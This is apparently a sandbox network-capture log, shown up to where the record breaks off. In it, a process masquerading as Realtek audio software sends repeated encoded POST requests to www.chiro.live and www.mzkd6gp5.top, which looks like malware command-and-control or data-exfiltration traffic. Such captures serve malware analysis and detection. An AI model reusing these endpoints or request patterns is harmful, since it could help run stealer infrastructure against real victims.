Jan 9, 2025 08:33:39.628202915 CET	1289	IN	Data Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61 Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
Jan 9, 2025 08:33:39.628334045 CET	1289	IN	Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
Jan 9, 2025 08:33:39.628418922 CET	1289	IN	Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
Jan 9, 2025 08:33:39.628484964 CET	661	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jan 9, 2025 08:33:39.628493071 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	49763	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:44.794708014 CET	793	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d Data Ascii: cOnShP=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
Jan 9, 2025 08:33:44.948772907 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:33:44 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4b 73 9b 30 10 be e7 57 50 0e 99 76 a6 36 06 3b 7e 34 90 4e 42 fd ac 63 27 8e 13 c0 97 8c 90 14 4b 44 48 14 04 d8 e9 f4 bf 17 43 27 a6 e3 1e ba 07 49 bb da fd 76 f7 5b c9 fc f0 6d 69 af bd bb a1 42 64 c8 ae ce cc c3 a6 30 c0 b7 96 8a b9 7a 75 a6 14 62 12 0c 50 75 2c d5 10 4b a0 40 02 e2 04 4b 4b 7d 5c 8f 1a fd 3f 9e c7 6b 22 65 d4 c0 3f 52 9a 59 ea ae 91 82 06 14 61 04 24 f5 19 56 15 28 b8 c4 bc 88 9d 0e 2d 8c b6 f8 24 9a 83 10 5b 6a 46 71 1e 89 58 d6 02 72 8a 24 b1 10 ce 28 c4 8d 52 f9 ac 50 4e 25 05 ac 91 40 c0 b0 a5 37 5b 75 38 49 25 c3 57 a6 56 ed 65 3b 65 91 5c 24 30 a6 91 3c b6 f5 ef da 63 fc 12 e3 84 d4 4a 68 5d a6 31 b3 0e fd 7d d1 b4 3c cf 7b ad 26 24 34 16 4d 46 33 ac a9 8a 76 84 34 b5 d3 34 66 c9 5e 9d 9e d3 14 17 ff 97 c2 d4 8e 83 31 7d 81 f6 8a e0 4c 00 64 a9 48 3c 57 c7 8f 9f ea 64 54 2d 2b 72 1f 15 ec 4a bc 93 5a 00 32 50 59 6b 7e 07 26 5e 52 0e 25 15 5c a9 41 29 3f df f9 3b b8 1c 24 a7 1c 89 bc 29 45 d4 64 02 16 f3 15 bc 49 8a 86 14 [TRUNCATED] Data Ascii: 265SKs0WPv6;~4NBc'KDHC'Iv[miBd0zubPu,K@KK}\?k"e?RYa$V(-$[jFqXr$(RPN%@7[u8I%WVe;e\$0<cJh]1}<{&$4MF3v44f^1}LdH<WdT-+rJZ2PYk~&^R%\A)?;$)EdIKQr0,<H%M)^i[F*q.$33tIk3:;cl3&\|Ij<\yP_8`N}&+;'7pYA\|,W`dc<fxE3>E=u<n{qI@oUb?MfjnjRtOx0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	49764	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:47.462510109 CET	813	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d Data Ascii: cOnShP=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
Jan 9, 2025 08:33:47.607381105 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:33:47 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c cd cd f7 06 d2 49 dc f8 56 c7 4e 1c 27 80 5f 32 42 52 2c 11 21 51 10 60 a7 d3 7f 2f 36 9d 98 8e fb 50 3d 20 ed b2 7b 76 cf 59 c9 fe f0 6d 31 58 f9 77 37 0a 91 11 bb 3c b3 f7 9b c2 00 df 38 2a e6 ea e5 99 52 2e 9b 60 80 aa e3 c1 8c b0 04 0a 24 20 49 b1 74 d4 c7 d5 b0 d1 fb 13 79 fc 4d a4 8c 1b f8 47 46 73 47 dd 36 32 d0 80 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 93 1b 07 a3 0d 3e c9 e6 20 c2 8e 9a 53 5c c4 22 91 b5 84 82 22 49 1c 84 73 0a 71 e3 60 7c 56 28 a7 92 02 d6 48 21 60 d8 31 35 a3 0e 27 a9 64 f8 d2 d6 ab fd 40 e7 d0 24 17 29 4c 68 2c 8f b4 fe dd 7b 82 5f 12 9c 92 5a 0b c6 45 96 30 67 cf ef 8b ae 17 45 d1 35 34 48 68 22 34 46 73 ac ab 8a 7e 84 b4 f5 d3 32 f6 41 bd ba 3c a7 25 da ff 57 c2 d6 8f 83 b1 03 81 76 8a e0 4c 00 e4 a8 48 3c 57 c7 8f 9f ea 62 54 94 15 b9 8b 4b 75 25 de 4a 3d 04 39 a8 bc b5 b8 bd 12 2f 19 87 92 0a ae d4 a0 94 9f ef fa ed 43 f6 ab a0 1c 89 42 93 22 d6 98 80 e5 7c 05 d7 48 49 48 71 14 [TRUNCATED] Data Ascii: 265Sr0}WP2LIVN'_2BR,!Q`/6P= {vYm1Xw7<8R.`$ ItyMGFsG62"> S\""Isq`\|V(H!`15'd@$)Lh,{_ZE0gE54Hh"4Fs~2A<%WvLH<WbTKu%J=9/CB"\|HIHq(Q]1dEmvZFaXnc' MM3+nW:\Qrt&SoxY,h/GMEsi>1sY<wkc/``K:oU~""q`r<2E;hg#&}5&Y[9(lCQ"[\|.\{$aVtQh*gUM)_~x0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	49765	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:50.137120962 CET	3867	OUT	POST /jwa9/ HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.chiro.live Referer: http://www.chiro.live/jwa9/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 [TRUNCATED] Data Ascii: cOnShP=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/Nxv [TRUNCATED]
Jan 9, 2025 08:33:50.137171984 CET	4095	OUT	Data Raw: 6c 75 46 35 44 6a 70 5a 6a 76 63 74 79 69 58 64 49 33 7a 73 31 39 6c 50 38 55 63 72 44 41 6b 6d 67 2b 67 66 51 76 4e 63 73 4b 58 36 7a 34 4d 47 2f 53 2f 75 4e 47 41 33 52 45 33 57 6f 76 65 43 32 68 2f 38 74 4c 2f 52 4a 45 73 4a 32 70 76 78 71 48 Data Ascii: luF5DjpZjvctyiXdI3zs19lP8UcrDAkmg+gfQvNcsKX6z4MG/S/uNGA3RE3WoveC2h/8tL/RJEsJ2pvxqHv266brxLO7mNNf7jMNxYlsUDVJtanUOskFmr8nB+Cb7gYPN+yJpLQz71eu4ZJstGc1aaLjGYprnZIrN3NG42oksg2n9deCaQoXqf9zwY0ks4DKM4ZoDDAs1XmWIzEbmwRho3yr+FcT6Jl59gCCGzTQbMgtQL53yeI
Jan 9, 2025 08:33:50.282599926 CET	806	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:33:50 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c cd c5 97 c4 6e 20 9d c4 8d 6f 25 76 e2 38 01 fc 92 11 92 62 89 08 89 82 00 3b 9d fe 7b c1 74 62 3a ee 43 f5 80 b4 cb ee d9 3d 67 25 eb c3 b7 c5 70 e5 df dd 28 44 46 ec f2 c4 aa 36 85 01 be b1 55 cc d5 cb 13 a5 5c 16 c1 00 d5 c7 bd 19 61 09 14 48 40 92 62 69 ab 8f ab 51 ab ff 27 f2 f0 9b 48 19 b7 f0 8f 8c e6 b6 ba 6d 65 a0 05 45 14 03 49 03 86 55 05 0a 2e 31 2f 73 a7 37 36 46 1b 7c 94 cd 41 84 6d 35 a7 b8 88 45 22 1b 09 05 45 92 d8 08 e7 14 e2 d6 de f8 ac 50 4e 25 05 ac 95 42 c0 b0 6d 6a 46 13 4e 52 c9 f0 a5 a5 d7 fb 9e ce be 49 2e 52 98 d0 58 1e 68 fd bb f7 04 bf 24 38 25 8d 16 8c 8b 2c 61 76 c5 ef 8b ae 17 45 71 6e 68 90 d0 44 68 8c e6 58 57 15 fd 00 69 e9 c7 65 ac bd 7a 4d 79 8e 4b f4 fe af 84 a5 1f 06 63 05 02 ed 14 c1 99 00 c8 56 91 78 ae 8f 1f 3f 35 c5 a8 29 2b 72 17 97 ea 4a bc 95 7a 08 72 50 7b 1b 71 95 12 2f 19 87 92 0a ae 34 a0 94 9f ef fa 55 21 d5 2a 28 47 a2 d0 a4 88 35 26 60 39 5f c1 35 52 12 52 6c [TRUNCATED] Data Ascii: 266Sr0}WP2Ln o%v8b;{tb:C=g%p(DF6U\aH@biQ'HmeEIU.1/s76F\|Am5E"EPN%BmjFNRI.RXh$8%,avEqnhDhXWiezMyKcVx?5)+rJzrP{q/4U!(G5&`9_5RRlE=H(,&0-?YFmwFaLs`S!NAIm0zzEvW^QqMho&dY,h?Gq,wmpDkb3K'9,e08N;'h_vH},e9s3v{IEiK9j?Q8;w"[\|.\{$QVou\|7MenM)_M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.11.20	49766	45.33.23.183	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:52.806382895 CET	538	OUT	GET /jwa9/?cOnShP=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.chiro.live Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:33:52.951255083 CET	1289	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Thu, 09 Jan 2025 07:33:52 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 41 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED] Data Ascii: 4A5<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736408032.0024940817&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICJjT25TaFA9bmJFYjZCYXBqckNZZDN2cElVNjVkUlRhb1BLMmM0ODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tSYjlSSHRpdjg3U1p3eE15SWs9Jk52QT1xVXdQUVBUUW1Ud3lpelRVIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9u [TRUNCATED]
Jan 9, 2025 08:33:52.951263905 CET	68	IN	Data Raw: 6a 63 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: jcifQ=="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.11.20	49767	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:58.076328039 CET	799	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 5a 65 49 76 53 57 69 51 76 61 4d 32 34 4a 4d 34 50 46 54 48 77 3d 3d Data Ascii: cOnShP=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoZeIvSWiQvaM24JM4PFTHw==
Jan 9, 2025 08:33:58.644093990 CET	917	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:33:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12qwGKUccMWc2Z9VVpNI1y5S5R6kI0PPK%2BRFlK8TtyACYO%2FnDDcaZ1U4yAShPvlOLxDGBKuK6nj%2Fqd9oJx8zPf%2F80dVq13%2FnzIJcLhMLZ0N9XFfKFN7pBW4iw%2BvDAjvbB3B6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2bdfe5c6786d4-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118864&min_rtt=118864&rtt_var=59432&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:33:58.644109964 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.11.20	49768	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:00.717298985 CET	819	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 63 57 74 79 63 37 70 2f 6b 70 79 57 6e 7a 46 2f 37 4f 57 4a 47 45 76 48 5a 49 6d 62 6b 6e 67 67 79 6f 42 68 30 30 66 45 4d 62 76 43 6e 69 6d 44 36 59 76 6e 64 4e 56 35 65 76 37 62 6d 4d 45 72 6a 53 59 4e 7a 31 74 53 6c 48 43 42 72 38 75 76 2b 58 44 67 6a 50 38 71 7a 63 6a 32 77 65 2b 59 67 6b 39 45 79 31 48 65 6f 72 52 42 36 2f 33 57 78 70 4c 31 5a 47 4a 34 49 59 6a 6d 49 75 79 55 32 4c 70 50 54 53 79 67 69 47 54 38 47 